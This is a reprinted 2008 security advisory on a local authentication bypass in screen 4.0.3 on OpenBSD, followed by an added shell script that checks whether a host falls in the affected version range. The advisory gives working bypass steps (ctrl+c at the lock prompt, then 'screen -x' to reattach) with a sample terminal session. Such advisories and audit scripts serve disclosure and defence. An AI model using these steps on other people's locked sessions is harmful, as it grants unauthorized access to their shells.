
screen 4.0.3 Local Authentication Bypass Vulnerability (OpenBSD)

19 Jun 2008 | Reported by Root | Type: seebug | Source: www.seebug.org

Screen 4.0.3 local authentication bypass vulnerability on OpenBSD. Allows local attackers to gain system access by bypassing the password-protected screen lock.

Code

                                                                     _   _ _____ _     ___ _____ _   _
                   / / / / ____/ /   /  _/_  __/ / / /
                  / /_/ / __/ / /    / /  / / / /_/ /
                 / __  / /___/ /____/ /  / / / __  /
                /_/ /_/_____/_____/___/ /_/ /_/ /_/
                           Helith - 0815
--------------------------------------------------------------------------------

Author: Rembrandt
Date  : Known since somewhere in &cant_remember (some years, really..)
Affected Software: screen <= 4.0.3
Affected OS      : OpenBSD (any up to current (which will become oBSD 4.4))
Type: Local
Type: Authentication Bypass

Greets go to: Helith and all affiliated/loyal people 


I did not find an advisory related to this so I decided to write a leet one.

screen is vulnerable to an authentication bypass which allows local attackers
to gain system access in case screen was locked with a password.

It has been tested on OpenBSD + screen 4.0.3 on x86/amd64.
But due to the nature of the behavior of screen and OpenBSD it should be
architecture/version independent for now.


How to check this?

Lock screen using ctrl+x
Choose a Password
Confirm the Password

Screen asks for a Password to unlock the screen.
Just press ctrl+c and, if you like, screen -x to reattach the screen session.

Example:

$ testscreen
/bin/ksh: testscreen: not found
$
Key:
Again:
Screen used by rembrandt <rembrandt>.
Password: <ctrl-c here>
$ screen -x
There are several suitable screens on:
        29602.ttyC0.raven       (Attached)
        25144.ttyC1.raven       (Detached)
Type "screen [-d] -r [pid.]tty.host" to resume one of them.
$ screen -x 25144
$ testscreen
/bin/ksh: testscreen: not found
$ 

Because of the nature of a locked screen you won't be able to lock your shell.
screen will never ask you for a password.

Of course this also works if you get access to an SSH session which has a locked
screen running. So in case you have locked your screen session which contains
an open SSH session to a host where you also have a locked screen session
you might have no password protection at all in case all systems are OpenBSD.
That is just another example. Important for you should be the combination of
screen and OpenBSD.

Do not claim it does not work because you just tested this against the latest
Linux/Solaris/Whatever.

It is known to work and I mentioned the OS.
Still it is known that it worked against some scary Linux distributions
which are not really common.

All security websites which report this as a fake may consider updating their
reports instead of simply claiming wrong things.

Have fun!


Kind regards,
Rembrandt
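
Added example, not part of the original advisory: a POSIX shell audit that flags hosts falling inside the affected set stated above (OpenBSD with screen <= 4.0.3). The function names are hypothetical, the banners in the comments are constructed samples, and the `screen -v` banner layout ("Screen version X.YY.ZZ ...") is an assumption; being in range is a reason to test the lock by hand, not proof of the bug.

```shell
#!/bin/sh
# Added example: inventory check against the advisory's stated affected range
# (OpenBSD, screen <= 4.0.3). All function names here are hypothetical.

# Turn a `screen -v` banner into "MAJOR MINOR PATCH" as plain integers.
# Constructed sample: "Screen version 4.00.03 (FAU) 23-Oct-06" -> "4 0 3".
# Prints nothing when the banner does not match the assumed layout.
screen_version_triplet() {
    printf '%s\n' "$1" | sed -n \
      's/^Screen version \([0-9][0-9]*\)\.\([0-9][0-9]*\)\.\([0-9][0-9]*\).*/\1 \2 \3/p' |
      awk '{ printf "%d %d %d\n", $1, $2, $3 }'   # strips zero padding
}

# $1 = output of `uname -s`, $2 = output of `screen -v`
# Returns 0 if inside the advisory's range, 1 if outside,
# 2 if the banner could not be parsed (treat as "unknown", not "safe").
in_advisory_range() {
    [ "$1" = "OpenBSD" ] || return 1
    set -- $(screen_version_triplet "$2")
    [ $# -eq 3 ] || return 2
    # Compare (major, minor, patch) with 4.0.3
    [ "$1" -lt 4 ] && return 0
    [ "$1" -gt 4 ] && return 1
    [ "$2" -gt 0 ] && return 1
    [ "$3" -le 3 ]
}

# Live check on the current host; skipped where screen is not installed.
if command -v screen >/dev/null 2>&1; then
    banner=$(screen -v 2>/dev/null || true)   # tolerate a non-zero exit from -v
    rc=0
    in_advisory_range "$(uname -s)" "$banner" || rc=$?
    case $rc in
        0) echo "REVIEW: $(uname -s) / $banner is inside the advisory's range" ;;
        1) echo "ok: outside the advisory's stated range" ;;
        *) echo "UNKNOWN: could not parse banner: $banner" ;;
    esac
fi
```

A version match only narrows down which hosts to look at; packages can carry local patches, so confirm on a test session before relying on the result either way.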
                              
